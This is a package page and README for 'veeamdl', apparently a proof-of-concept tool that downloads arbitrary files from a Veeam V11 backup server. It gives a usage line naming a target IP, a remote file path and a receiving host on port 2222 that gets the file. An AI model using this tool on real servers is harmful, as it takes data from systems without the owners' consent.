package
0.2.0
Repository: https://github.com/leakix/veeam-ds-client.git
Documentation: pkg.go.dev

# README

veeamdl

Downloads a file from a Veeam V11 server.

./veeamdl 192.168.0.10:9380 'C:\ProgramData\Veeam\Backup\Svc.VeeamBackup.log' 192.168.0.11
  • 192.168.0.10 is Veeam IP
  • 'C:\ProgramData\Veeam\Backup\Svc.VeeamBackup.log' is the file to download
  • 192.168.0.11 is your IP ( port 2222 must be open )

# Packages

No description provided by the author